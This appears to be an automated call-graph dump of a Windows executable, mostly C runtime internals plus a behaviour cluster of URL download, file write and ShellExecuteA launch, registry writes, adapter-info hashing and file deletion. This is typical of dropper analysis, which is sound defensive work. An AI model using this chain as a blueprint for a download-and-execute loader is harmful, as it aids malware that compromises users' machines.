___copy_to_char 58 API calls 40209->40210 40211 493596 40210->40211 40248 4942d2 9 API calls __invalid_parameter_noinfo_noreturn 40211->40248 40214 4935e9 40213->40214 40215 4935cb 40213->40215 40240 49fb64 40214->40240 40217 495208 ___copy_to_char 58 API calls 40215->40217 40239 4935a0 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 40217->40239 40218 4935ee 40249 49f803 58 API calls ___copy_to_char 40218->40249 40220 4935f7 40221 4937e5 40220->40221 40250 49f82d 58 API calls ___copy_to_char 40220->40250 40222 4942fd __NMSG_WRITE 8 API calls 40221->40222 40224 4937ef 40222->40224 40225 493609 40225->40221 40251 49f857 40225->40251 40227 49361b 40227->40221 40228 493624 40227->40228 40229 49369b 40228->40229 40230 493637 40228->40230 40261 49f939 58 API calls 4 library calls 40229->40261 40258 49f939 58 API calls 4 library calls 40230->40258 40233 4936a2 40233->40239 40262 49fbb4 58 API calls 4 library calls 40233->40262 40234 49364f 40234->40239 40259 49fbb4 58 API calls 4 library calls 40234->40259 40237 493668 40237->40239 40260 49f939 58 API calls 4 library calls 40237->40260 40239->40190 40241 49fb70 ___BuildCatchObject 40240->40241 40242 49fba5 ___BuildCatchObject 40241->40242 40243 498af7 __lock 58 API calls 40241->40243 40242->40218 40244 49fb80 40243->40244 40245 49fb93 40244->40245 40263 49fe47 40244->40263 40292 49fbab LeaveCriticalSection _doexit 40245->40292 40248->40239 40249->40220 40250->40225 40252 49f861 40251->40252 40253 49f876 40251->40253 40254 495208 ___copy_to_char 58 API calls 40252->40254 40253->40227 40255 49f866 40254->40255 40297 4942d2 9 API calls __invalid_parameter_noinfo_noreturn 40255->40297 40257 49f871 40257->40227 40258->40234 40259->40237 40260->40239 40261->40233 40262->40239 40264 49fe53 ___BuildCatchObject 40263->40264 40265 498af7 __lock 58 API calls 40264->40265 40266 49fe71 __tzset_nolock 40265->40266 40267 49f857 __tzset_nolock 58 API calls 40266->40267 40268 49fe86 40267->40268 40290 49ff25 __tzset_nolock 40268->40290 40293 49f803 58 API calls ___copy_to_char 40268->40293 40269 4942fd __NMSG_WRITE 8 API calls 40269->40290 40271 49fe98 40271->40290 40294 49f82d 58 API calls ___copy_to_char 40271->40294 40272 49ff71 GetTimeZoneInformation 40272->40290 40273 490bed _free 58 API calls 40273->40290 40275 49feaa 40275->40290 40295 4a3f99 58 API calls 2 library calls 40275->40295 40277 49ffd8 WideCharToMultiByte 40277->40290 40278 49feb8 40279 4b1667 __getenv_helper_nolock 78 API calls 40278->40279 40285 49fed9 type_info::before 40279->40285 40280 4a0010 WideCharToMultiByte 40280->40290 40282 49ff0c _strlen 40284 498cde __malloc_crt 58 API calls 40282->40284 40283 4aff8e 58 API calls __tzset_nolock 40283->40290 40287 49ff1a _strlen 40284->40287 40285->40282 40286 490bed _free 58 API calls 40285->40286 40285->40290 40286->40282 40288 49c0fd __get_tzname 58 API calls 40287->40288 40287->40290 40288->40290 40289 4a0157 __tzset_nolock ___BuildCatchObject 40289->40245 40290->40269 40290->40272 40290->40273 40290->40277 40290->40280 40290->40283 40290->40289 40291 493c2d 61 API calls UnDecorator::getTemplateArgumentList 40290->40291 40296 4a00d7 LeaveCriticalSection _doexit 40290->40296 40291->40290 40292->40242 40293->40271 40294->40275 40295->40278 40296->40290 40297->40257 40325 49019c 40298->40325 40301 4927d4 40302 495208 ___copy_to_char 58 API calls 40301->40302 40303 4927d9 40302->40303 40333 4942d2 9 API calls __invalid_parameter_noinfo_noreturn 40303->40333 40304 4927e9 MultiByteToWideChar 40306 492815 40304->40306 40307 492804 GetLastError 40304->40307 40310 498cde __malloc_crt 58 API calls 40306->40310 40334 4951e7 58 API calls 3 library calls 40307->40334 40308 47d7a3 40308->39891 40312 49281d 40310->40312 40311 492810 40314 490bed _free 58 API calls 40311->40314 40312->40311 40313 492825 MultiByteToWideChar 40312->40313 40313->40307 40315 49283f 40313->40315 40316 4928a0 40314->40316 40317 498cde __malloc_crt 58 API calls 40315->40317 40318 490bed _free 58 API calls 40316->40318 40319 49284a 40317->40319 40318->40308 40319->40311 40335 49d51e 88 API calls 3 library calls 40319->40335 40321 492866 40321->40311 40322 49286f WideCharToMultiByte 40321->40322 40322->40311 40323 49288b GetLastError 40322->40323 40336 4951e7 58 API calls 3 library calls 40323->40336 40326 4901ad 40325->40326 40331 4901fa 40325->40331 40337 495007 40326->40337 40328 4901b3 40330 4901da 40328->40330 40342 4945dc 58 API calls 6 library calls 40328->40342 40330->40331 40343 49495e 58 API calls 6 library calls 40330->40343 40331->40301 40331->40304 40333->40308 40334->40311 40335->40321 40336->40311 40338 49501f __getptd_noexit 58 API calls 40337->40338 40339 49500d 40338->40339 40341 49501a 40339->40341 40344 497c2e 58 API calls 3 library calls 40339->40344 40341->40328 40342->40330 40343->40331 40346 490c62 _malloc 58 API calls 40345->40346 40347 47e684 40346->40347 40348 490c62 _malloc 58 API calls 40347->40348 40349 47e690 40348->40349 40350 47e6b4 GetAdaptersInfo 40349->40350 40351 47e699 40349->40351 40352 47e6c4 40350->40352 40353 47e6db GetAdaptersInfo 40350->40353 40354 491f2d _wprintf 85 API calls 40351->40354 40356 490bed _free 58 API calls 40352->40356 40357 47e741 40353->40357 40358 47e6ea 40353->40358 40355 47e6a3 40354->40355 40359 490bed _free 58 API calls 40355->40359 40361 47e6ca 40356->40361 40360 490bed _free 58 API calls 40357->40360 40395 4904a6 40358->40395 40363 47e6a9 40359->40363 40364 47e74a 40360->40364 40365 490c62 _malloc 58 API calls 40361->40365 40363->39919 40364->39919 40367 47e6d2 40365->40367 40367->40351 40367->40353 40369 47e737 40370 491f2d _wprintf 85 API calls 40369->40370 40370->40357 40372 4856d0 59 API calls 40371->40372 40373 47e8bb CryptAcquireContextW 40372->40373 40374 47e8e9 CryptCreateHash 40373->40374 40375 47e8d8 40373->40375 40377 47e914 CryptHashData 40374->40377 40378 47e903 40374->40378 40610 4a0eca RaiseException 40375->40610 40379 47e943 CryptGetHashParam 40377->40379 40380 47e932 40377->40380 40611 4a0eca RaiseException 40378->40611 40383 47e963 40379->40383 40385 47e974 _memset 40379->40385 40612 4a0eca RaiseException 40380->40612 40613 4a0eca RaiseException 40383->40613 40386 47e993 CryptGetHashParam 40385->40386 40387 47e9a8 40386->40387 40394 47e9b9 40386->40394 40614 4a0eca RaiseException 40387->40614 40389 47ea10 40391 47ea16 CryptDestroyHash CryptReleaseContext 40389->40391 40390 4904a6 _sprintf 83 API calls 40390->40394 40392 47ea33 40391->40392 40392->39925 40393 483ea0 59 API calls 40393->40394 40394->40389 40394->40390 40394->40393 40396 4904c2 40395->40396 40397 4904d7 40395->40397 40398 495208 ___copy_to_char 58 API calls 40396->40398 40397->40396 40399 4904de 40397->40399 40400 4904c7 40398->40400 40424 496ab6 40399->40424 40423 4942d2 9 API calls __invalid_parameter_noinfo_noreturn 40400->40423 40403 490504 40404 47e725 40403->40404 40448 4964ef 78 API calls 7 library calls 40403->40448 40406 491f2d 40404->40406 40407 491f39 ___BuildCatchObject 40406->40407 40408 491f4a 40407->40408 40409 491f5f _vwprintf_helper 40407->40409 40410 495208 ___copy_to_char 58 API calls 40408->40410 40459 490e92 40409->40459 40411 491f4f 40410->40411 40475 4942d2 9 API calls __invalid_parameter_noinfo_noreturn 40411->40475 40414 491f6f _vwprintf_helper 40464 49afd2 40414->40464 40416 491f5a ___BuildCatchObject 40416->40369 40417 491f82 _vwprintf_helper 40418 496ab6 __output_l 83 API calls 40417->40418 40419 491f9b _vwprintf_helper 40418->40419 40471 49afa1 40419->40471 40423->40404 40425 49019c _LocaleUpdate::_LocaleUpdate 58 API calls 40424->40425 40426 496b2b 40425->40426 40427 495208 ___copy_to_char 58 API calls 40426->40427 40428 496b30 40427->40428 40429 497601 40428->40429 40445 496b50 __output_l __aulldvrm _strlen 40428->40445 40449 49816b 40428->40449 40430 495208 ___copy_to_char 58 API calls 40429->40430 40431 497606 40430->40431 40457 4942d2 9 API calls __invalid_parameter_noinfo_noreturn 40431->40457 40433 4975db 40435 49a77e __getch_nolock 6 API calls 40433->40435 40436 4975fd 40435->40436 40436->40403 40438 49766a 78 API calls __output_l 40438->40445 40439 4971b9 DecodePointer 40439->40445 40440 4976b2 78 API calls _write_multi_char 40440->40445 40441 490bed _free 58 API calls 40441->40445 40442 4aadf7 60 API calls __cftof 40442->40445 40443 498cde __malloc_crt 58 API calls 40443->40445 40444 49721c DecodePointer 40444->40445 40445->40429 40445->40433 40445->40438 40445->40439 40445->40440 40445->40441 40445->40442 40445->40443 40445->40444 40446 497241 DecodePointer 40445->40446 40447 4976de 78 API calls _write_string 40445->40447 40456 492bcc 58 API calls _LocaleUpdate::_LocaleUpdate 40445->40456 40446->40445 40447->40445 40448->40404 40450 49818a 40449->40450 40451 498175 40449->40451 40450->40445 40452 495208 ___copy_to_char 58 API calls 40451->40452 40453 49817a 40452->40453 40458 4942d2 9 API calls __invalid_parameter_noinfo_noreturn 40453->40458 40455 498185 40455->40445 40456->40445 40457->40433 40458->40455 40460 490e9d 40459->40460 40461 490eb3 EnterCriticalSection 40459->40461 40462 498af7 __lock 58 API calls 40460->40462 40461->40414 40463 490ea6 40462->40463 40463->40414 40465 49816b __fseek_nolock 58 API calls 40464->40465 40466 49afdf 40465->40466 40477 4a89c2 40466->40477 40468 49afe5 _vwprintf_helper 40469 498cde __malloc_crt 58 API calls 40468->40469 40470 49b034 40468->40470 40469->40470 40470->40417 40472 49afaa 40471->40472 40473 491faf 40471->40473 40472->40473 40487 49836b 40472->40487 40476 491fc9 LeaveCriticalSection LeaveCriticalSection _vwprintf_helper __getstream 40473->40476 40475->40416 40476->40416 40478 4a89cd 40477->40478 40479 4a89da 40477->40479 40480 495208 ___copy_to_char 58 API calls 40478->40480 40482 4a89e6 40479->40482 40483 495208 ___copy_to_char 58 API calls 40479->40483 40481 4a89d2 40480->40481 40481->40468 40482->40468 40484 4a8a07 40483->40484 40486 4942d2 9 API calls __invalid_parameter_noinfo_noreturn 40484->40486 40486->40481 40488 49837e 40487->40488 40492 4983a2 40487->40492 40489 49816b __fseek_nolock 58 API calls 40488->40489 40488->40492 40490 49839b 40489->40490 40493 49df14 40490->40493 40492->40473 40494 49df20 ___BuildCatchObject 40493->40494 40495 49df2d 40494->40495 40496 49df44 40494->40496 40593 4951d4 58 API calls __getptd_noexit 40495->40593 40498 49dfe3 40496->40498 40501 49df58 40496->40501 40597 4951d4 58 API calls __getptd_noexit 40498->40597 40500 49df32 40503 495208 ___copy_to_char 58 API calls 40500->40503 40504 49df80 40501->40504 40505 49df76 40501->40505 40502 49df7b 40508 495208 ___copy_to_char 58 API calls 40502->40508 40516 49df39 ___BuildCatchObject 40503->40516 40521 4ab134 40504->40521 40594 4951d4 58 API calls __getptd_noexit 40505->40594 40510 49dfef 40508->40510 40509 49df86 40511 49df99 40509->40511 40512 49dfac 40509->40512 40598 4942d2 9 API calls __invalid_parameter_noinfo_noreturn 40510->40598 40530 49e003 40511->40530 40515 495208 ___copy_to_char 58 API calls 40512->40515 40518 49dfb1 40515->40518 40516->40492 40517 49dfa5 40596 49dfdb LeaveCriticalSection __unlock_fhandle 40517->40596 40595 4951d4 58 API calls __getptd_noexit 40518->40595 40522 4ab140 ___BuildCatchObject 40521->40522 40523 4ab18f EnterCriticalSection 40522->40523 40525 498af7 __lock 58 API calls 40522->40525 40524 4ab1b5 ___BuildCatchObject 40523->40524 40524->40509 40526 4ab165 40525->40526 40527 4ab17d 40526->40527 40599 4a263e InitializeCriticalSectionAndSpinCount 40526->40599 40600 4ab1b9 LeaveCriticalSection _doexit 40527->40600 40531 49e010 __ftell_nolock 40530->40531 40532 49e04f 40531->40532 40533 49e06e 40531->40533 40578 49e044 40531->40578 40601 4951d4 58 API calls __getptd_noexit 40532->40601 40538 49e0c6 40533->40538 40539 49e0aa 40533->40539 40534 49a77e __getch_nolock 6 API calls 40536 49e864 40534->40536 40536->40517 40537 49e054 40541 495208 ___copy_to_char 58 API calls 40537->40541 40542 49e0df 40538->40542 40605 49f744 60 API calls 3 library calls 40538->40605 40603 4951d4 58 API calls __getptd_noexit 40539->40603 40544 49e05b 40541->40544 40546 4a89c2 __stbuf 58 API calls 40542->40546 40543 49e0af 40547 495208 ___copy_to_char 58 API calls 40543->40547 40602 4942d2 9 API calls __invalid_parameter_noinfo_noreturn 40544->40602 40549 49e0ed 40546->40549 40550 49e0b6 40547->40550 40551 49e446 40549->40551 40555 495007 _strtok 58 API calls 40549->40555 40604 4942d2 9 API calls __invalid_parameter_noinfo_noreturn 40550->40604 40552 49e7d9 WriteFile 40551->40552 40553 49e464 40551->40553 40556 49e439 GetLastError 40552->40556 40581 49e678 40552->40581 40557 49e588 40553->40557 40558 49e47a 40553->40558 40559 49e119 GetConsoleMode 40555->40559 40570 49e406 40556->40570 40575 49e67d 40557->40575 40576 49e593 40557->40576 40562 49e4e9 WriteFile 40558->40562 40565 49e812 40558->40565 40558->40570 40559->40551 40561 49e158 40559->40561 40560 49e168 GetConsoleCP 40560->40565 40587 49e197 40560->40587 40561->40551 40561->40560 40562->40556 40562->40558 40563 495208 ___copy_to_char 58 API calls 40564 49e840 40563->40564 40609 4951d4 58 API calls __getptd_noexit 40564->40609 40565->40563 40565->40578 40566 49e566 40567 49e809 40566->40567 40568 49e571 40566->40568 40608 4951e7 58 API calls 3 library calls 40567->40608 40573 495208 ___copy_to_char 58 API calls 40568->40573 40569 49e6f2 WideCharToMultiByte 40569->40556 40586 49e739 40569->40586 40570->40565 40570->40566 40570->40578 40571 49e5f8 WriteFile 40571->40556 40577 49e647 40571->40577 40579 49e576 40573->40579 40575->40565 40575->40569 40576->40565 40576->40571 40577->40570 40577->40576 40577->40581 40578->40534 40607 4951d4 58 API calls __getptd_noexit 40579->40607 40580 49e741 WriteFile 40584 49e794 GetLastError 40580->40584 40580->40586 40581->40570 40584->40586 40585 4ac76c 60 API calls __write_nolock 40585->40587 40586->40570 40586->40575 40586->40580 40586->40581 40587->40570 40587->40585 40588 49e280 WideCharToMultiByte 40587->40588 40591 49e2ed 40587->40591 40606 492d33 58 API calls __isleadbyte_l 40587->40606 40588->40570 40589 49e2bb WriteFile 40588->40589 40589->40556 40589->40591 40590 4b058c WriteConsoleW CreateFileW __putwch_nolock 40590->40591 40591->40556 40591->40570 40591->40587 40591->40590 40592 49e315 WriteFile 40591->40592 40592->40556 40592->40591 40593->40500 40594->40502 40595->40517 40596->40516 40597->40502 40598->40516 40599->40527 40600->40523 40601->40537 40602->40578 40603->40543 40604->40578 40605->40542 40606->40587 40607->40578 40608->40578 40609->40578 40610->40374 40611->40377 40612->40379 40613->40385 40614->40394 40616 483c74 _memset 40615->40616 40617 483c62 40615->40617 40616->39930 40618 483c96 40617->40618 40619 483c67 40617->40619 40621 4bf23e 59 API calls 40618->40621 40620 493b4c 59 API calls 40619->40620 40622 483c6d 40620->40622 40621->40622 40622->40616 40632 4bf1bb 59 API calls 3 library calls 40622->40632 40626 488513 40625->40626 40630 488520 40625->40630 40626->40630 40633 485810 40626->40633 40627 488619 40627->39932 40629 4bf23e 59 API calls 40629->40630 40630->40627 40630->40629 40631 486760 59 API calls 40630->40631 40631->40630 40634 485823 40633->40634 40635 4858b6 40633->40635 40637 486760 59 API calls 40634->40637 40639 485841 _signal 40634->40639 40636 4bf23e 59 API calls 40635->40636 40640 4858c0 40636->40640 40638 485833 40637->40638 40638->40630 40639->40630 40640->40630 40641->39935 40642->39938 40643->39941 40644->39945 40645->39948 40647 484ff2 40646->40647 40648 484f92 40646->40648 40647->39967 40649 484fb4 40648->40649 40650 484ff7 40648->40650 40652 484fd3 40649->40652 40653 484fe5 40649->40653 40651 4bf23e 59 API calls 40650->40651 40656 485001 40651->40656 40654 485f50 59 API calls 40652->40654 40658 485f50 40653->40658 40657 484fe0 40654->40657 40657->39967 40659 485f61 40658->40659 40665 485f7e 40658->40665 40660 485f75 40659->40660 40662 493b4c 59 API calls 40659->40662 40660->40665 40667 4bf1bb 59 API calls 3 library calls 40660->40667 40662->40660 40665->40647 40668->39991 40669->39991 41317 49f7c0 __ftell_nolock 41316->41317 41318 48e6b6 timeGetTime 41317->41318 41319 493f74 58 API calls 41318->41319 41320 48e6cc 41319->41320 41431 47c6a0 RegOpenKeyExW 41320->41431 41323 48e72e InternetOpenW 41373 48e6d4 _memset _strstr _wcsstr 41323->41373 41324 485ae0 59 API calls 41324->41373 41325 48ea8d lstrlenA lstrcpyA lstrcpyA lstrlenA 41325->41373 41326 48ea4c SHGetFolderPathA 41328 48ea67 PathAppendA DeleteFileA 41326->41328 41326->41373 41328->41373 41329 48eada lstrlenA 41329->41373 41330 484690 59 API calls 41343 48e7be _memmove 41330->41343 41331 48ee4d 41333 47ef50 58 API calls 41331->41333 41332 4856d0 59 API calls 41332->41373 41338 48ee5d 41333->41338 41335 483ff0 59 API calls 41335->41373 41336 482900 60 API calls 41336->41373 41337 48eb53 lstrcpyW 41339 48eb74 lstrlenA 41337->41339 41337->41373 41342 483ea0 59 API calls 41338->41342 41344 48eeb1 41338->41344 41340 490c62 _malloc 58 API calls 41339->41340 41340->41373 41341 4859d0 59 API calls 41341->41373 41342->41338 41343->41330 41343->41373 41478 47dd40 73 API calls 4 library calls 41343->41478 41346 47ef50 58 API calls 41344->41346 41345 48e8f3 lstrcpyW 41347 48e943 InternetOpenUrlW InternetReadFile 41345->41347 41345->41373 41355 48eec1 41346->41355 41349 48e9ec InternetCloseHandle InternetCloseHandle 41347->41349 41350 48e97c SHGetFolderPathA 41347->41350 41348 48eb99 MultiByteToWideChar lstrcpyW 41348->41373 41349->41373 41350->41349 41351 48e996 PathAppendA 41350->41351 41456 4920b6 41351->41456 41352 48e93c lstrcatW 41352->41347 41353 48ec3d lstrlenW lstrlenA lstrcpyA lstrcpyA lstrlenA 41353->41373 41355->41355 41357 483ea0 59 API calls 41355->41357 41362 48ef12 41355->41362 41356 48ebf0 SHGetFolderPathA 41358 48ec17 PathAppendA DeleteFileA 41356->41358 41356->41373 41357->41355 41358->41373 41359 48e9c4 lstrlenA 41459 492b02 41359->41459 41361 48ecaa lstrlenA 41361->41373 41363 483ff0 59 API calls 41362->41363 41365 48ef3a 41363->41365 41364 493a38 __fcloseall 83 API calls 41364->41373 41366 482900 60 API calls 41365->41366 41368 48ef45 lstrcpyW 41366->41368 41367 48ed1f lstrcpyW 41370 48ed43 lstrlenA 41367->41370 41367->41373 41372 48ef6a 41368->41372 41371 490c62 _malloc 58 API calls 41370->41371 41371->41373 41374 483ff0 59 API calls 41372->41374 41373->41323 41373->41324 41373->41325 41373->41326 41373->41329 41373->41331 41373->41332 41373->41335 41373->41336 41373->41337 41373->41339 41373->41341 41373->41343 41373->41345 41373->41347 41373->41348 41373->41349 41373->41352 41373->41353 41373->41356 41373->41359 41373->41361 41373->41364 41373->41367 41373->41370 41376 48ed68 MultiByteToWideChar lstrcpyW lstrlenW 41373->41376 41380 48edc3 SHGetFolderPathA 41373->41380 41384 490bed 58 API calls _free 41373->41384 41436 47c500 SHGetFolderPathA 41373->41436 41472 481b10 timeGetTime timeGetTime 41373->41472 41375 48ef9f 41374->41375 41377 482900 60 API calls 41375->41377 41376->41373 41378 48edad lstrlenW 41376->41378 41379 48efac lstrcpyW 41377->41379 41378->41373 41383 48ee44 41378->41383 41379->41383 41380->41373 41382 48edea PathAppendA DeleteFileA 41380->41382 41382->41373 41384->41373 41386 48dbf6 __ftell_nolock 41385->41386 41387 483ff0 59 API calls 41386->41387 41388 48dc31 41387->41388 41389 4856d0 59 API calls 41388->41389 41390 48dc82 41389->41390 41391 483ff0 59 API calls 41390->41391 41392 48dcb1 41391->41392 41393 47ecb0 60 API calls 41392->41393 41394 48dcc5 41393->41394 41395 48dcf0 LoadLibraryW GetProcAddress 41394->41395 41409 48e3d3 41394->41409 41396 483c40 59 API calls 41395->41396 41397 48dd1a UuidCreate UuidToStringA 41396->41397 41399 48dd84 41397->41399 41400 4856d0 59 API calls 41399->41400 41401 48dda7 RpcStringFreeA PathAppendA CreateDirectoryA 41400->41401 41402 4884e0 59 API calls 41401->41402 41403 48de18 41402->41403 41404 483ff0 59 API calls 41403->41404 41405 48de4c 41404->41405 41406 482900 60 API calls 41405->41406 41407 48de5c 41406->41407 41408 483580 59 API calls 41407->41408 41423 48de73 _memset _wcsstr 41408->41423 41410 48deec InternetOpenA 41411 483ff0 59 API calls 41410->41411 41411->41423 41412 482900 60 API calls 41412->41423 41413 484690 59 API calls 41419 48df60 _memmove 41413->41419 41414 484690 59 API calls 41414->41423 41416 482840 60 API calls 41416->41423 41417 48e079 InternetOpenUrlA 41417->41423 41418 48e0e2 HttpQueryInfoW 41418->41423 41419->41413 41419->41423 41904 47dd40 73 API calls 4 library calls 41419->41904 41420 483ff0 59 API calls 41420->41423 41421 483010 59 API calls 41421->41423 41422 48e1ec lstrcpyA PathAppendA 41422->41423 41423->41409 41423->41410 41423->41412 41423->41414 41423->41416 41423->41417 41423->41418 41423->41419 41423->41420 41423->41421 41423->41422 41423->41423 41424 4856d0 59 API calls 41423->41424 41427 48e2b1 InternetReadFile 41423->41427 41428 48e2dc WriteFile 41423->41428 41429 48e316 CloseHandle InternetCloseHandle InternetCloseHandle 41423->41429 41430 48e334 ShellExecuteA 41423->41430 41425 48e267 CreateFileA 41424->41425 41425->41423 41426 48e299 SetFilePointer 41425->41426 41426->41423 41427->41423 41428->41423 41428->41429 41429->41423 41430->41423 41432 47c734 41431->41432 41433 47c6cc RegQueryValueExW 41431->41433 41432->41373 41434 47c6fd RegCloseKey 41433->41434 41435 47c70c RegSetValueExW RegCloseKey 41433->41435 41434->41373 41435->41432 41437 47c525 41436->41437 41438 47c52c PathAppendA 41436->41438 41437->41373 41439 4920b6 125 API calls 41438->41439 41440 47c550 41439->41440 41441 47c559 41440->41441 41479 49387f 41440->41479 41441->41373 41443 47c56c 41492 493455 41443->41492 41445 47c572 41505 490cf4 41445->41505 41447 47c57a 41448 47c5a5 41447->41448 41449 47c589 41447->41449 41450 493a38 __fcloseall 83 API calls 41448->41450 41522 4922f5 41449->41522 41452 47c5ab 41450->41452 41452->41373 41454 493a38 __fcloseall 83 API calls 41455 47c599 41454->41455 41455->41373 41811 491ff2 41456->41811 41458 4920c6 41458->41373 41460 492b0e ___BuildCatchObject 41459->41460 41461 492b2c 41460->41461 41462 492b44 41460->41462 41464 492b3c ___BuildCatchObject 41460->41464 41463 495208 ___copy_to_char 58 API calls 41461->41463 41465 490e53 __lock_file 59 API calls 41462->41465 41466 492b31 41463->41466 41464->41373 41467 492b4a 41465->41467 41901 4942d2 9 API calls __invalid_parameter_noinfo_noreturn 41466->41901 41902 4929a9 78 API calls 6 library calls 41467->41902 41470 492b5e 41903 492b7c LeaveCriticalSection LeaveCriticalSection _vwprintf_helper 41470->41903 41473 481b2f 41472->41473 41474 481b7f 41472->41474 41473->41474 41475 481b40 PeekMessageW 41473->41475 41477 481b58 DispatchMessageW PeekMessageW 41473->41477 41474->41373 41475->41473 41476 481b70 Sleep timeGetTime 41475->41476 41476->41474 41476->41475 41477->41473 41477->41476 41478->41343 41480 49388b ___BuildCatchObject 41479->41480 41481 49389d 41480->41481 41483 4938c3 41480->41483 41482 495208 ___copy_to_char 58 API calls 41481->41482 41484 4938a2 41482->41484 41485 490e53 __lock_file 59 API calls 41483->41485 41537 4942d2 9 API calls __invalid_parameter_noinfo_noreturn 41484->41537 41486 4938c9 41485->41486 41525 4937f0 41486->41525 41491 4938ad ___BuildCatchObject 41491->41443 41493 493461 ___BuildCatchObject 41492->41493 41494 493488 41493->41494 41495 493473 41493->41495 41497 490e53 __lock_file 59 API calls 41494->41497 41496 495208 ___copy_to_char 58 API calls 41495->41496 41498 493478 41496->41498 41499 49348e 41497->41499 41634 4942d2 9 API calls __invalid_parameter_noinfo_noreturn 41498->41634 41500 4930c5 __ftell_nolock 67 API calls 41499->41500 41502 493499 41500->41502 41635 4934b9 LeaveCriticalSection LeaveCriticalSection _vwprintf_helper 41502->41635 41504 493483 ___BuildCatchObject 41504->41445 41506 490d00 ___BuildCatchObject 41505->41506 41507 490d0e 41506->41507 41508 490d24 41506->41508 41509 495208 ___copy_to_char 58 API calls 41507->41509 41510 49816b __fseek_nolock 58 API calls 41508->41510 41511 490d13 41509->41511 41512 490d2d 41510->41512 41636 4942d2 9 API calls __invalid_parameter_noinfo_noreturn 41511->41636 41513 490e53 __lock_file 59 API calls 41512->41513 41515 490d35 41513->41515 41516 49836b __flush 78 API calls 41515->41516 41518 490d41 41516->41518 41517 490d1e ___BuildCatchObject 41517->41447 41519 49818f __write 64 API calls 41518->41519 41520 490d8b 41519->41520 41637 490dab LeaveCriticalSection LeaveCriticalSection _vwprintf_helper 41520->41637 41638 492310 41522->41638 41524 47c593 41524->41454 41526 4937fe 41525->41526 41529 49380e 41525->41529 41527 495208 ___copy_to_char 58 API calls 41526->41527 41530 493803 41527->41530 41528 493824 41532 49836b __flush 78 API calls 41528->41532 41529->41528 41567 4930c5 41529->41567 41538 4938fa LeaveCriticalSection LeaveCriticalSection _vwprintf_helper 41530->41538 41534 493837 41532->41534 41533 49816b __fseek_nolock 58 API calls 41535 493865 41533->41535 41534->41533 41539 49818f 41535->41539 41537->41491 41538->41491 41540 49819b ___BuildCatchObject 41539->41540 41541 4981a8 41540->41541 41542 4981bf 41540->41542 41609 4951d4 58 API calls __getptd_noexit 41541->41609 41544 49825e 41542->41544 41546 4981d3 41542->41546 41613 4951d4 58 API calls __getptd_noexit 41544->41613 41545 4981ad 41548 495208 ___copy_to_char 58 API calls 41545->41548 41549 4981fb 41546->41549 41550 4981f1 41546->41550 41562 4981b4 ___BuildCatchObject 41548->41562 41553 4ab134 ___lock_fhandle 59 API calls 41549->41553 41610 4951d4 58 API calls __getptd_noexit 41550->41610 41551 4981f6 41555 495208 ___copy_to_char 58 API calls 41551->41555 41554 498201 41553->41554 41556 498214 41554->41556 41557 498227 41554->41557 41558 49826a 41555->41558 41596 49827e 41556->41596 41561 495208 ___copy_to_char 58 API calls 41557->41561 41614 4942d2 9 API calls __invalid_parameter_noinfo_noreturn 41558->41614 41564 49822c 41561->41564 41562->41530 41563 498220 41612 498256 LeaveCriticalSection __unlock_fhandle 41563->41612 41611 4951d4 58 API calls __getptd_noexit 41564->41611 41568 4930d2 __ftell_nolock 41567->41568 41569 4930ea 41568->41569 41570 493102 41568->41570 41571 495208 ___copy_to_char 58 API calls 41569->41571 41572 49816b __fseek_nolock 58 API calls 41570->41572 41573 4930ef 41571->41573 41574 49310a 41572->41574 41632 4942d2 9 API calls __invalid_parameter_noinfo_noreturn 41573->41632 41576 49818f __write 64 API calls 41574->41576 41577 493126 41576->41577 41580 4931a9 41577->41580 41581 493316 41577->41581 41594 4930fa 41577->41594 41578 49a77e __getch_nolock 6 API calls 41579 493451 41578->41579 41579->41528 41583 4931cf 41580->41583 41587 4932d2 41580->41587 41582 49331f 41581->41582 41581->41587 41584 495208 ___copy_to_char 58 API calls 41582->41584 41583->41594 41633 49f648 62 API calls 6 library calls 41583->41633 41584->41594 41586 493208 41589 493234 ReadFile 41586->41589 41586->41594 41588 49818f __write 64 API calls 41587->41588 41587->41594 41590 493383 41588->41590 41591 493259 41589->41591 41589->41594 41592 49818f __write 64 API calls 41590->41592 41590->41594 41593 49818f __write 64 API calls 41591->41593 41592->41594 41595 49326c 41593->41595 41594->41578 41595->41594 41615 4ab3f1 41596->41615 41598 49828f 41599 498297 41598->41599 41600 4982a6 SetFilePointerEx 41598->41600 41601 495208 ___copy_to_char 58 API calls 41599->41601 41602 4982be SetFilePointerEx 41600->41602 41603 4982d2 GetLastError 41600->41603 41606 49829c 41601->41606 41602->41603 41604 4982e1 41602->41604 41628 4951e7 58 API calls 3 library calls 41603->41628 41604->41606 41607 4982e7 SetFilePointerEx 41604->41607 41606->41563 41608 495208 ___copy_to_char 58 API calls 41607->41608 41608->41606 41609->41545 41610->41551 41611->41563 41612->41562 41613->41551 41614->41562 41616 4ab3fc 41615->41616 41617 4ab411 41615->41617 41629 4951d4 58 API calls __getptd_noexit 41616->41629 41622 4ab436 41617->41622 41630 4951d4 58 API calls __getptd_noexit 41617->41630 41619 4ab401 41621 495208 ___copy_to_char 58 API calls 41619->41621 41626 4ab409 41621->41626 41622->41598 41623 4ab440 41624 495208 ___copy_to_char 58 API calls 41623->41624 41625 4ab448 41624->41625 41631 4942d2 9 API calls __invalid_parameter_noinfo_noreturn 41625->41631 41626->41598 41628->41606 41629->41619 41630->41623 41631->41626 41632->41594 41633->41586 41634->41504 41635->41504 41636->41517 41637->41517 41639 49231c ___BuildCatchObject 41638->41639 41640 49235f 41639->41640 41641 492332 _memset 41639->41641 41643 492357 ___BuildCatchObject 41639->41643 41642 490e53 __lock_file 59 API calls 41640->41642 41645 495208 ___copy_to_char 58 API calls 41641->41645 41644 492365 41642->41644 41643->41524 41651 492130 41644->41651 41647 49234c 41645->41647 41665 4942d2 9 API calls __invalid_parameter_noinfo_noreturn 41647->41665 41654 49214b _memset 41651->41654 41658 492166 41651->41658 41652 492156 41653 495208 ___copy_to_char 58 API calls 41652->41653 41655 49215b 41653->41655 41654->41652 41654->41658 41659 4921a6 41654->41659 41687 4942d2 9 API calls __invalid_parameter_noinfo_noreturn 41655->41687 41666 492399 LeaveCriticalSection LeaveCriticalSection _vwprintf_helper 41658->41666 41659->41658 41660 4922b7 _memset 41659->41660 41661 49816b __fseek_nolock 58 API calls 41659->41661 41667 49b2f2 41659->41667 41688 499544 58 API calls 3 library calls 41659->41688 41689 49b5c4 41659->41689 41663 495208 ___copy_to_char 58 API calls 41660->41663 41661->41659 41663->41655 41665->41643 41666->41643 41668 49b2fd 41667->41668 41672 49b312 41667->41672 41669 495208 ___copy_to_char 